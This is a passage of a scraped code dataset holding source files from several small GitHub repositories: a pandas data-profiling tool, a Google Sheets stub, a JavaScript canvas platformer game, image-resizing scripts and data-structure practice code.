report)\r\n null_and_not_null.to_csv(report_name)\r\n print(\"Completed finding count of null and not null records in each column.,\")\r\n\r\n def find_unique_values(source, output_path):\r\n \"\"\"This function receives dataframe and output path as an input.\r\n Finds the unique records and number of times it is repeated.\r\n Writes those details as a csv file in the output path\"\"\"\r\n print(\"Started finding unique values and its count in each column.,\")\r\n report = 'Unique_values'\r\n os.mkdir(os.path.join(output_path, report))\r\n for col_nm in list(source.columns):\r\n report_col_name = 'Unique_values_in_column_' + str(col_nm) + '.csv'\r\n report_name = os.path.join(output_path, report, report_col_name)\r\n unique_value_df = source[col_nm].value_counts().to_frame()\r\n unique_value_df.index.name = col_nm\r\n unique_value_df.columns = ['count']\r\n unique_value_df.to_csv(report_name)\r\n print(\"Completed finding unique values and its count in each column.,\")\r\n\r\n def find_stats(source, output_path):\r\n \"\"\"This function receives dataframe and output path as an input.\r\n Find the following stats in each column count, min, max, std, 25%, 50% and 75%.\r\n Writes those information in a csv file in the output path\"\"\"\r\n print(\"Started finding the stats of each column.,\")\r\n report = 'High_level_stats.csv'\r\n report_with_path = os.path.join(output_path, report)\r\n source.describe(include='all').transpose().to_csv(report_with_path)\r\n print(\"Completed finding the stats of each column.,\")\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5752279758453369,
"alphanum_fraction": 0.6223404407501221,
"avg_line_length": 63.900001525878906,
"blob_id": "a0668625fdd4d7b574a0543e1b1f21a43a667fc7",
"content_id": "b4f46b815fb48b4e7f0d9caf3164ddb0d07d500d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1316,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 20,
"path": "/Data_Insights/Implemented as Objects/__main__.py",
"repo_name": "thileebandharmat/data_insight",
"src_encoding": "UTF-8",
"text": "from Driver import Driver\r\n\r\n\"\"\"\r\nIt has 4 parameters.\r\n1) Integer - Source file type. enter 1. CSV \\n 2. DB - SQL Server \\n 3. MySQL \\n 4. DB - Oracle \\n 5. DB - MS Access \\n 6. DB - Netezza \"\r\n \"\\n 7. Simple JSON \\n 8. Nested Json \\n 9. Others \\n\r\n2) Absolute path of source file. Enclosed with Double quotes\r\n3) Absolute path where Output to be placed. Enclosed with Double quotes\r\n4) Primary key in a square bracket, separated by comma, each column name should be enclosed in quotes.\r\n If there is no primary key, kindly enter [] \r\n\"\"\"\r\n\r\ndata_1 = Driver(1,\"F:\\xxxxx\\python\\\\Data_2.csv\",\"F:\\xxxxx\\python\\\\\",['pk_3','pk_4','pk_5'])\r\ndata_2 = Driver(1,\"F:\\xxxxx\\python\\\\Input_data_1.csv\",\"F:\\xxxxx\\python\\\\\",['pk_3','pk_4','pk_5'])\r\ndata_3 = Driver(1,\"F:\\xxxxx\\python\\\\Data_2.csv\",\"F:\\xxxxx\\python\\\\\",['pk_3','pk_4','pk_5'])\r\ndata_4 = Driver(1,\"F:\\xxxxx\\python\\\\Input_data_1.csv\",\"F:\\xxxxx\\python\\\\\",['pk_3','pk_4','pk_5'])\r\ndata_5 = Driver(1,\"F:\\xxxxx\\python\\\\Data_2.csv\",\"F:\\xxxxx\\python\\\\\",['pk_3','pk_4','pk_5'])\r\ndata_6 = Driver(1,\"F:\\xxxxx\\python\\\\Input_data_1.csv\",\"F:\\xxxxx\\python\\\\\",['pk_3','pk_4','pk_5'])\r\ndata_7 = Driver(1,\"F:\\xxxxx\\python\\\\Data_2.csv\",\"F:\\xxxxx\\python\\\\\",['pk_3','pk_4','pk_5'])\r\ndata_8 = Driver(1,\"F:\\xxxxx\\python\\\\Input_data_1.csv\",\"F:\\xxxxx\\python\\\\\",['pk_3','pk_4','pk_5'])"
},
{
"alpha_fraction": 0.7882353067398071,
"alphanum_fraction": 0.7882353067398071,
"avg_line_length": 26.33333396911621,
"blob_id": "dc461155595e6725ecb9e007d5cac6f05c99ff4d",
"content_id": "c8b04d8366d4a3188346adfb055d3d17d9b56556",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 3,
"path": "/Data_Insights/__main__.py",
"repo_name": "thileebandharmat/data_insight",
"src_encoding": "UTF-8",
"text": "from data_insight_driver import DataInsightDriver as di\r\n\r\ndi.data_insight_driver()\r\n"
},
{
"alpha_fraction": 0.8399999737739563,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 49,
"blob_id": "87373dddf403d4e066edf8a98d70ace1c0b0cb04",
"content_id": "2da2d6f1989a6d6daf50777dbb24893e182bd6af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 100,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 2,
"path": "/README.md",
"repo_name": "thileebandharmat/data_insight",
"src_encoding": "UTF-8",
"text": "# Insight creation\nThis code creates highlevel insight about that data available in varoius sources\n"
},
{
"alpha_fraction": 0.5370258688926697,
"alphanum_fraction": 0.5436484217643738,
"avg_line_length": 39.97468185424805,
"blob_id": "2f4f713896fa789a7c7b6adc687c02f34f35fb1d",
"content_id": "6cfce211b661e484895d8818f3fe5f657fa322bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3322,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 79,
"path": "/Data_Insights/data_insight_driver.py",
"repo_name": "thileebandharmat/data_insight",
"src_encoding": "UTF-8",
"text": "from Source_To_Dataframe import SrcToDatafarme as sd\r\nfrom insights import Insights as ist\r\nimport time\r\nimport os\r\nimport sys\r\n\r\nclass DataInsightDriver:\r\n \"\"\"This class contains the driver functions, gets user input and calls others functions\"\"\"\r\n\r\n def data_insight_driver():\r\n print(\"Enter option from below based on your source data type\")\r\n src_type = int(input(\" 1. CSV \\n 2. DB - SQL Server \\n 3. MySQL \\n 4. DB - Oracle \\n 5. DB - MS Access \\n 6. DB - Netezza \"\r\n \"\\n 7. Simple JSON \\n 8. Nested Json \\n 9. Others \\n \"))\r\n src_file_path = input(\"Enter the Absolute path of source file: \")\r\n\r\n try:\r\n if src_type == 1:\r\n source = sd.load_csv(src_file_path)\r\n elif src_type == 2:\r\n source = sd.load_sqlserver_data(src_file_path)\r\n elif src_type == 3:\r\n source = sd.load_mysql_data(src_file_path)\r\n elif src_type == 4:\r\n source = sd.load_oracle_data(src_file_path)\r\n elif src_type == 5:\r\n source = sd.load_msaccess_data(src_file_path)\r\n elif src_type == 6:\r\n source = sd.load_netezza_data(src_file_path)\r\n elif src_type == 7:\r\n source = sd.load_json(src_file_path)\r\n elif src_type == 8:\r\n source = sd.load_json_normalize(src_file_path)\r\n elif src_type == 9:\r\n print(\"Other sources are not supported now. Kindly contact Admin.\")\r\n time.sleep(30)\r\n sys.exit()\r\n else:\r\n print(\"Choosen Invalid option, kindly choose correct option.\")\r\n time.sleep(30)\r\n sys.exit()\r\n except Exception as err:\r\n print(str(err))\r\n sys.exit()\r\n\r\n print(\"Enter the primary key column name, if it is a combination of multiple columns, seperate it with comma\")\r\n print(\"if you don't know primary key, please press enter key. We will be considering combination of all columns as primary key.\")\r\n primary_key = (input()).split(\",\")\r\n output_root_folder = input(\"Please enter the absolute path of output, when you want results to be published: \")\r\n report = \"Report_\"+time.strftime(\"%Y%m%d_%H%M%S\")\r\n output_path = output_root_folder+report\r\n try:\r\n os.mkdir(output_path)\r\n except Exception as err:\r\n print(err)\r\n try:\r\n ist.create_summary(source, output_path)\r\n except Exception as err:\r\n print(err)\r\n try:\r\n ist.find_complete_duplicates(source, output_path)\r\n except Exception as err:\r\n print(err)\r\n try:\r\n ist.find_pk_duplicates(source, output_path, primary_key)\r\n except Exception as err:\r\n print(err)\r\n try:\r\n ist.find_null_counts(source, output_path)\r\n except Exception as err:\r\n print(err)\r\n try:\r\n ist.find_unique_values(source, output_path)\r\n except Exception as err:\r\n print(err)\r\n try:\r\n ist.find_stats(source, output_path)\r\n except Exception as err:\r\n print(err)\r\n print(\"Output is available in: \", output_path)\r\n\r\n\r\n\r\n"
}
] | 6 |
mvwicky/reading-stats | https://github.com/mvwicky/reading-stats | 35f01c25efdfe0e60654be94405a474c010d0867 | bbcb2e261cdb83b5a9c19dbe5a4c1c26b957b42d | 0c54e53655e1ef13762d721e35a2094cf870d698 | refs/heads/master | 2020-12-02T11:52:23.921998 | 2019-12-31T00:24:36 | 2019-12-31T00:24:36 | 230,997,411 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6930692791938782,
"alphanum_fraction": 0.6955445408821106,
"avg_line_length": 17.363636016845703,
"blob_id": "090aecab9d6793c907bdb3a545341e5dffa2d1ef",
"content_id": "303abebc31987084227a0f29db33f0687670081e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 404,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 22,
"path": "/reading_stats/__init__.py",
"repo_name": "mvwicky/reading-stats",
"src_encoding": "UTF-8",
"text": "from pathlib import Path\n\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nHERE: Path = Path(__file__).resolve().parent\nROOT: Path = HERE.parent\n\nscope = [\n \"https://spreadsheets.google.com/feeds\",\n \"https://www.googleapis.com/auth/drive\",\n]\n\ncred = ServiceAccountCredentials.from_json_keyfile_name()\n\n\ndef main():\n pass\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5840708017349243,
"alphanum_fraction": 0.6430678367614746,
"avg_line_length": 17.83333396911621,
"blob_id": "e6cc45a9a42d42d0783c0c09ba273502b64af369",
"content_id": "aa778603b6cd5f43c1235eb347bdd1ec57fae398",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 339,
"license_type": "permissive",
"max_line_length": 36,
"num_lines": 18,
"path": "/pyproject.toml",
"repo_name": "mvwicky/reading-stats",
"src_encoding": "UTF-8",
"text": "[tool.poetry]\nname = \"reading-stats\"\nversion = \"0.1.0\"\ndescription = \"\"\nauthors = [\"Michael Van Wickle <[email protected]>\"]\n\n[tool.poetry.dependencies]\npython = \"^3.7\"\noauth2client = \"^4.1.3\"\ngspread = \"^3.1.0\"\nenvirons = \"^7.0.0\"\n\n[tool.poetry.dev-dependencies]\npytest = \"^5.0\"\n\n[build-system]\nrequires = [\"poetry>=0.12\"]\nbuild-backend = \"poetry.masonry.api\"\n"
}
] | 2 |
DevAshleyD/Hillin | https://github.com/DevAshleyD/Hillin | 0a07315601c784f00b4446e3e8bec7f0db25e36f | 9f97f03c4a167840cf354157f2e998e8bf7a008f | c35b95a93ac9b5c00a101d29cbf972f92da0c8b0 | refs/heads/master | 2023-01-28T08:11:48.493829 | 2020-06-15T16:35:23 | 2020-06-15T16:35:23 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4435117244720459,
"alphanum_fraction": 0.44980761408805847,
"avg_line_length": 37.904762268066406,
"blob_id": "2d9d79078e69e04b4ae8db8b7d0d1ebb2a6e6010",
"content_id": "821d92f66334b98a8d9437b9cab8a51a4f5568bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5718,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 147,
"path": "/src/game.js",
"repo_name": "DevAshleyD/Hillin",
"src_encoding": "UTF-8",
"text": "import Player from \"./player\";\nimport Levels from './levels';\n// import Tile from '../assets/Tiles/grassMid.png';\n\nclass Game {\n constructor(keysPressed) {\n Game.DIM_X = 1400; \n Game.DIM_Y = 700;\n Game.MAP_EL_WIDTH = 50;\n Game.MAP_EL_HEIGHT = 50;\n this.loadLevel(0);\n this.hazards = ['a']\n this.ground_color = \"#000000\"\n this.keysPressed = keysPressed;\n \n this.hasKey = false; // UNCOMMENT THIS WHEN GOING TO PROD\n // this.hasKey = true;\n \n this.spriteFilenames = Levels.spriteFilenames;\n this.player = new Player({\n pos: Levels[this.levelNum].startPos,\n color: \"#00FF00\"\n }, Game.DIM_X);\n }\n\n drawLevel(ctx) {\n ctx.clearRect(0, 0, Game.DIM_X, Game.DIM_Y)\n for (let i = 0; i < this.level.length; i ++) {\n for (let j = 0; j < this.level[i].length; j++) {\n let currentBlock = this.level[i][j];\n if (currentBlock != 0) {\n let img = new Image();\n let platformXPos = j * Game.MAP_EL_WIDTH;\n let platformYPos = i * Game.MAP_EL_HEIGHT;\n\n if (this.hazards.includes(currentBlock)) {\n img.src = `./assets/Tiles_resized/resized_liquid${this.hazardType}${this.spriteFilenames[this.level[i][j]]}.png`\n } else if (currentBlock === 'k') {\n if (!this.hasKey) {\n // draw key\n img.src = `./assets/Items/keyRed.png`\n } else {\n continue\n }\n } else if (currentBlock === 'd' || currentBlock === 'o') {\n let doorStatus = 'closed'\n let doorPiece = currentBlock === 'd' ? 'Mid' : 'Top'\n if (this.hasKey) {\n doorStatus = 'open'\n } \n img.src = `./assets/Tiles_resized/resized_door_${doorStatus}${doorPiece}.png`\n } else {\n img.src = `./assets/Tiles_resized/resized_${this.levelType}${this.spriteFilenames[this.level[i][j]]}.png`;\n }\n\n img.onload = () => {\n ctx.drawImage(\n img,\n platformXPos,\n platformYPos,\n img.width,\n img.height,\n )\n }\n }\n }\n }\n }\n\n checkCollisions(objA,objB) {\n return ((objA.posX < (objB.posX + objB.width)) &&\n ((objA.posX + objA.width) > objB.posX) &&\n (objA.posY < (objB.posY + objB.height)) &&\n ((objA.posY + objA.height) > objB.posY)) \n }\n \n resetLevel() {\n // Reset player position\n if (!this.player) return;\n this.player.posX = Levels[this.levelNum].startPos[0];\n this.player.posY = Levels[this.levelNum].startPos[1];\n this.hasKey = false; // UNCOMMENT THIS WHEN GOING TO PROD\n }\n\n endScreen() {\n const endScreen = document.getElementById(\"endgame-screen\");\n endScreen.style.display = 'block';\n window.dance(true)\n // in index.html make an endscreen el with display none\n // set to display here\n // description of game bloob\n // controls\n }\n \n loadLevel(levelNum) {\n if (levelNum === 4) this.endScreen();\n this.levelNum = levelNum;\n this.level = Levels[this.levelNum].level;\n this.levelType = Levels[this.levelNum].type;\n this.hazardType = Levels[this.levelNum].hazardType\n document.getElementById(\"background-canvas\").style.backgroundImage = `url('${Levels[this.levelNum].background}')`;\n\n this.resetLevel()\n }\n\n step(ctx,backgroundCtx) {\n this.player.move(this.keysPressed);\n\n for (let i = 0; i < Game.DIM_Y / Game.MAP_EL_HEIGHT; i ++) {\n for (let j = 0; j < Game.DIM_X / Game.MAP_EL_WIDTH; j ++) {\n let currentBlock = this.level[i][j]\n if (currentBlock != 0) {\n let platformXPos = j * Game.MAP_EL_WIDTH;\n let platformYPos = i * Game.MAP_EL_HEIGHT;\n let mapEl = {\n posX: platformXPos, \n posY:platformYPos, \n height: Game.MAP_EL_WIDTH, \n width: Game.MAP_EL_HEIGHT\n }\n if (this.checkCollisions(this.player,mapEl)) {\n if (currentBlock === 'k') {\n if (!this.hasKey) {\n this.hasKey = true;\n this.drawLevel(backgroundCtx)\n }\n } else if (this.hazards.includes(currentBlock)) {\n this.resetLevel()\n this.drawLevel(backgroundCtx)\n } else if (currentBlock === 'd' || currentBlock === 'o') {\n if (!this.hasKey) continue;\n // next level\n this.loadLevel(this.levelNum + 1)\n this.drawLevel(backgroundCtx)\n } else {\n this.player.resolveMapCollision(mapEl)\n }\n }\n }\n }\n }\n ctx.clearRect(0, 0, Game.DIM_X, Game.DIM_Y)\n this.player.draw(ctx)\n }\n}\n\nexport default Game;"
},
{
"alpha_fraction": 0.5382165312767029,
"alphanum_fraction": 0.5509554147720337,
"avg_line_length": 20,
"blob_id": "a872f77414c6ff3cea0968bad422399397d344dd",
"content_id": "c24e02306d25252b75c0a04cbf2696a9ca4b67cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 314,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 15,
"path": "/src/moving_object.js",
"repo_name": "DevAshleyD/Hillin",
"src_encoding": "UTF-8",
"text": "class MovingObject {\n constructor(objectInfo) {\n this.pos = objectInfo[\"pos\"];\n this.vel = objectInfo[\"vel\"];\n this.color = objectInfo[\"color\"];\n }\n\n draw(ctx) {\n ctx.beginPath();\n ctx.rect(...this.pos,20,40);\n ctx.stroke();\n }\n};\n\nexport default MovingObject;"
},
{
"alpha_fraction": 0.6934306621551514,
"alphanum_fraction": 0.6934306621551514,
"avg_line_length": 44.66666793823242,
"blob_id": "39ea41a926590566a0f28e4871759d67a9f1156f",
"content_id": "d5763d9f1e4da77c40470bb9bc88585b65a4f29a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 274,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 6,
"path": "/flip_image_script.py",
"repo_name": "DevAshleyD/Hillin",
"src_encoding": "UTF-8",
"text": "import os\nimport subprocess\n\nROOT_DIR = './assets/Player_sprites/walking'\nfor f in [f for f in os.listdir(os.path.join(ROOT_DIR,'right')) if f.endswith('.png')]:\n subprocess.check_call(['convert',os.path.join(ROOT_DIR,'right',f),'-flop',os.path.join(ROOT_DIR,'left',f)])\n"
},
{
"alpha_fraction": 0.5754026174545288,
"alphanum_fraction": 0.587481677532196,
"avg_line_length": 31.927711486816406,
"blob_id": "41e0d29c8310500b663ae01d1334bac32b2f9c15",
"content_id": "c487cb570db1af289ed1af1de03dafbb851c9bdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2732,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 83,
"path": "/src/index.js",
"repo_name": "DevAshleyD/Hillin",
"src_encoding": "UTF-8",
"text": "// const MovingObject = require(\"./moving_object\");\nimport Game from './game';\nimport GameView from './game_view';\n\ndocument.addEventListener(\"DOMContentLoaded\", () => {\n const elCanvas = document.getElementById(\"game-canvas\");\n const backgroundCanvas = document.getElementById(\"background-canvas\")\n const musicPlayback = document.getElementById(\"music-playback\");\n const startGameButton = document.getElementById(\"start-button\");\n const startGameScreen = document.getElementById(\"start-game-screen\")\n const endGameScreen = document.getElementById(\"endgame-screen\")\n const restartGameButton = document.getElementById(\"restart-game\")\n const audio = new Audio('./assets/Music/1.mp3')\n elCanvas.height = 700;\n elCanvas.width = 1400;\n backgroundCanvas.height = 700;\n backgroundCanvas.width = 1400;\n\n let gameView = null;\n\n let keysPressed = {};\n document.addEventListener(\"keydown\", (e) => {\n keysPressed[e.key] = true;\n }, false);\n document.addEventListener(\"keyup\", (e) => {\n keysPressed[e.key] = false;\n }, false);\n\n window.dance = (on) => {\n if (on) {\n const bloo1 = document.getElementById(\"bloo-end-1\")\n const bloo2 = document.getElementById(\"bloo-end-2\")\n let switchin = true;\n window.danceInterval = setInterval(() => {\n\n if(switchin) {\n bloo1.src = \"./assets/Player_sprites/p2_jump_left.png\"\n bloo2.src = \"./assets/Player_sprites/p2_jump_right.png\"\n switchin = false\n } else {\n bloo2.src = \"./assets/Player_sprites/p2_jump_left.png\"\n bloo1.src = \"./assets/Player_sprites/p2_jump_right.png\"\n switchin = true\n }\n }, 150)\n } else {\n clearInterval(window.danceInterval)\n }\n\n }\n\n musicPlayback.addEventListener(\"click\", (e) => {\n if (window.musicDisabled){\n audio.pause()\n } else {\n audio.play()\n }\n window.musicDisabled = !window.musicDisabled;\n })\n\n //play the music\n audio.play()\n \n \n const ctx = elCanvas.getContext(\"2d\");\n const ctxBackground = backgroundCanvas.getContext(\"2d\");\n const startGame = () => {\n keysPressed = {};\n window.game = new Game(keysPressed);\n gameView = new GameView(ctx,ctxBackground,game);\n gameView.start();\n startGameScreen.style.display = \"none\"\n endGameScreen.style.display = \"none\"\n }\n startGameButton.addEventListener(\"click\", (e) => {\n startGame() \n })\n\n restartGameButton.addEventListener(\"click\", (e) => {\n startGame()\n })\n\n})"
},
{
"alpha_fraction": 0.6733871102333069,
"alphanum_fraction": 0.6895161271095276,
"avg_line_length": 40.5,
"blob_id": "b71ba60f44c848ef653a35858975aea6e35aa884",
"content_id": "c42f79611d254942b22cd8b37b2c26502587265d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 248,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 6,
"path": "/resize_script.py",
"repo_name": "DevAshleyD/Hillin",
"src_encoding": "UTF-8",
"text": "import os\nimport subprocess\n\nROOT_DIR = './assets/Tiles'\nfor f in [f for f in os.listdir(ROOT_DIR) if f.endswith('.png')]:\n subprocess.check_call(['convert',os.path.join(ROOT_DIR,f),'-resize','50x50',os.path.join(ROOT_DIR,f'small/resized_{f}')])"
},
{
"alpha_fraction": 0.4755600690841675,
"alphanum_fraction": 0.4862525463104248,
"avg_line_length": 33.46198654174805,
"blob_id": "70a70c378cefc8ab75cc024f19c932fc6cdb4b6d",
"content_id": "7a5499c9daece55883d56ae03b7155b343cb6812",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5892,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 171,
"path": "/src/player.js",
"repo_name": "DevAshleyD/Hillin",
"src_encoding": "UTF-8",
"text": "class Player {\n constructor(playerData, gameWidth) {\n this.posX = playerData[\"pos\"][0];\n this.posY = playerData[\"pos\"][1];\n this.width = 30;\n this.height = 57;\n this.gravity = -5;\n this.isJumping = false;\n this.isGrounded = true;\n this.facingRight = true;\n this.walkingFrame = 1;\n this.skipFrame = false;\n this.maxWalkingFrame = 11;\n this.startingJumpAcc = 16\n // this.facingRight = false;\n // this.isStopped = true\n this.maxXValue = gameWidth - this.width\n // this.isDashing = false;\n // this.dashLength = 20;\n // this.dashAcc = 0;\n // this.dashDir = [0,0];\n this.jumpAcc = -1;\n this.jumpFrameDelay = 0;\n this.velocityX = 0;\n this.velocityY = 0;\n this.isStopped = true;\n this.maxVelocity = 100;\n this.friction = 0.2;\n // this.height = playerData[\"height\"];\n // this.width = playerData[\"width\"];\n this.color = playerData[\"color\"];\n this.jumpingRightSprite = new Image();\n this.jumpingRightSprite.src = `./assets/Player_sprites/p2_jump_right.png`;\n this.jumpingLeftSprite = new Image();\n this.jumpingLeftSprite.src = `./assets/Player_sprites/p2_jump_left.png`;\n this.standingRightSprite = new Image();\n this.standingRightSprite.src = `./assets/Player_sprites/p2_stand_right.png`;\n this.standingLeftSprite = new Image();\n this.standingLeftSprite.src = `./assets/Player_sprites/p2_stand_left.png`;\n this.walkingRightSpriteImgs = [];\n this.walkingLeftSpriteImgs = [];\n for (let i = 1; i <= this.maxWalkingFrame; i++) {\n let img = new Image();\n img.src = `./assets/Player_sprites/walking/right/p2_walk${i}.png`;\n let imgl = new Image();\n imgl.src = `./assets/Player_sprites/walking/left/p2_walk${i}.png`;\n this.walkingRightSpriteImgs.push(img)\n this.walkingLeftSpriteImgs.push(imgl)\n }\n }\n\n draw(ctx) {\n let drawImage = this.standingRightSprite;\n if (!this.isGrounded) {\n if (this.facingRight) {\n drawImage = this.jumpingRightSprite;\n } else {\n drawImage = this.jumpingLeftSprite;\n }\n } else if (this.isStopped) {\n if (this.facingRight) {\n drawImage = this.standingRightSprite;\n } else {\n drawImage = this.standingLeftSprite;\n }\n } else if (!this.isStopped) {\n if (this.facingRight) {\n drawImage = this.walkingRightSpriteImgs[this.walkingFrame - 1];\n } else {\n drawImage = this.walkingLeftSpriteImgs[this.walkingFrame - 1];\n }\n }\n ctx.drawImage(\n drawImage,\n this.posX,\n this.posY,\n this.width,\n this.height,\n )\n }\n\n move(keysPressed) {\n // if (this.velocityY === 0) this.isJumping = false;\n this.velocityX = 0;\n this.isStopped = true;\n if (keysPressed['d'] || keysPressed['ArrowRight']) {\n this.facingRight = true;\n this.velocityX = 7;\n }\n if (keysPressed['a'] || keysPressed['ArrowLeft']) {\n this.facingRight = false;\n this.velocityX = -7;\n }\n \n if (this.velocityX != 0){\n this.isStopped = false\n if (this.walkingFrame < this.maxWalkingFrame) {\n if (this.skipFrame) this.walkingFrame++;\n this.skipFrame = !this.skipFrame;\n } else {\n this.walkingFrame = 1;\n }\n this.posX += this.velocityX;\n if (this.posX > this.maxXValue) {\n this.posX = this.maxXValue;\n } else if (this.posX < 0){\n this.posX = 0;\n }\n }\n\n // Jump /////////////////////////////////////////\n this.velocityY = -this.gravity;\n if (keysPressed[' ']) {\n this.isGrounded = false\n if(!this.isJumping){\n this.isJumping = true;\n this.jumpAcc = this.startingJumpAcc;\n this.jumpFrameDelay = 0;\n }\n }\n if(this.jumpAcc > 0){\n this.velocityY -= this.jumpAcc;\n this.jumpAcc -= 1;\n } else if (this.jumpAcc === 0) {\n this.jumpAcc = -1;\n // this.isJumping = false;\n }\n if(this.velocityY != 0){\n this.posY += this.velocityY;\n }\n }\n\n\n\n resolveMapCollision(mapEl) {\n let dX = (this.posX + (this.width/2)) - (mapEl.posX + (mapEl.width/2));\n let dY = (this.posY + (this.height/2)) - (mapEl.posY + (mapEl.height/2));\n let absX = Math.abs(dX);\n let absY = Math.abs(dY); \n let max_width = (mapEl.width / 2) + (this.width / 2)\n let max_height = (mapEl.height / 2) + (this.height / 2)\n let oX = max_width - absX;\n let oY = max_height - absY;\n \n if(oX > 0 && oY > 0){\n if(oY > oX){\n if (dX < 0){ // object came from the left\n this.posX -= oX;\n } else { //if (dX > 0) object came from the right\n this.posX += oX;\n }\n } else {\n if (dY < 0){ // object came from the top\n this.isGrounded = true;\n if(this.jumpFrameDelay > 5){\n this.isJumping = false;\n } else {\n this.jumpFrameDelay++;\n }\n this.posY -= oY;\n }\n else { // object came from the bottom\n this.posY += oY;\n }\n } \n }\n }\n\n}\n\nexport default Player;"
},
{
"alpha_fraction": 0.2765151560306549,
"alphanum_fraction": 0.2765151560306549,
"avg_line_length": 21.04166603088379,
"blob_id": "2932227f2f84280f1374cd387a5e84df8c83538e",
"content_id": "0dc191ae054d2edc05d2496d74074a5da0168e97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 528,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 24,
"path": "/webpack.config.js",
"repo_name": "DevAshleyD/Hillin",
"src_encoding": "UTF-8",
"text": "var path = require(\"path\")\n\nmodule.export = {\n entry : './main.js',\n output : {\n path : path.join(__dirname,'./'),\n filename : 'index.js'\n },\n module: {\n rules: [\n {\n test: /\\.(png|svg|jpg|gif)$/,\n use: [\n {\n loaders: [\n 'file-loader',\n 'image-webpack-loader'\n ]\n }\n ],\n }\n ]\n }\n}"
}
] | 7 |
Paulreich20/codingpractice | https://github.com/Paulreich20/codingpractice | 404b90262300353bffb7911771adc99d3930f054 | 219ddc6379ac93eed7841c6054b1015d2eb03610 | 2ecf3bf730589f31dcf01bec7af6174d72c8f6f7 | refs/heads/master | 2020-07-23T01:34:32.351296 | 2019-09-09T20:53:31 | 2019-09-09T20:53:31 | 207,402,083 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4810924232006073,
"alphanum_fraction": 0.5042017102241516,
"avg_line_length": 15.629630088806152,
"blob_id": "063bec4df1141a2b85d0be75fde1719aa1f1c188",
"content_id": "ec253f09c0a7cb04f854bb92844ac4729a258b9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 476,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 27,
"path": "/Stacks&Queues/TwoStackQueue.java",
"repo_name": "Paulreich20/codingpractice",
"src_encoding": "UTF-8",
"text": "public class myQueue<T> {\r\n private myStack<T> stack1;\r\n private myStack<T> stack2;\r\n\r\n public enqueue(T item){\r\n if(!stack2.isEmpty()){\r\n stack2.popAll(stack1)\r\n }\r\n stack1.push(item);\r\n stack1.popAll(stack2);\r\n }\r\n\r\n public T dequeue(){\r\n return stack2.pop();\r\n }\r\n\r\n public T peek(){\r\n return stack2.peek();\r\n }\r\n\r\n public boolean T isEmpty(){\r\n return stack2.isEmpty();\r\n }\r\n\r\n\r\n\r\n}\r\n"
},
{
"alpha_fraction": 0.47607654333114624,
"alphanum_fraction": 0.49760764837265015,
"avg_line_length": 22.58823585510254,
"blob_id": "ea865e907d8fb5adfd155e9e553bef8506259caa",
"content_id": "88c1790ba5aabc573dbab441eb9672b8b52a14e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 418,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 17,
"path": "/Sorting/BinarySearch.py",
"repo_name": "Paulreich20/codingpractice",
"src_encoding": "UTF-8",
"text": "def BinarySearch(arr, start, end, x):\r\n med = (start + end) // 2\r\n\r\n if start >= end:\r\n print(start)\r\n print(end)\r\n return False\r\n if arr[med] == x:\r\n return med\r\n else:\r\n if arr[med] < x:\r\n return BinarySearch(arr, med+1, end,x)\r\n else:\r\n return BinarySearch(arr, start, med-1,x)\r\narr = [1,2,3,4]\r\n\r\n#print(BinarySearch(arr,0,len(arr), 4))\r\n"
},
{
"alpha_fraction": 0.5280236005783081,
"alphanum_fraction": 0.5309734344482422,
"avg_line_length": 26.25,
"blob_id": "04edae846af5a8f7ca43c0252957ea40fa1e8663",
"content_id": "e46f72a8311a4a69cb0a2aae6b360abd925e1a97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 339,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 12,
"path": "/Graphs&Trees/depthlinkedlist.py",
"repo_name": "Paulreich20/codingpractice",
"src_encoding": "UTF-8",
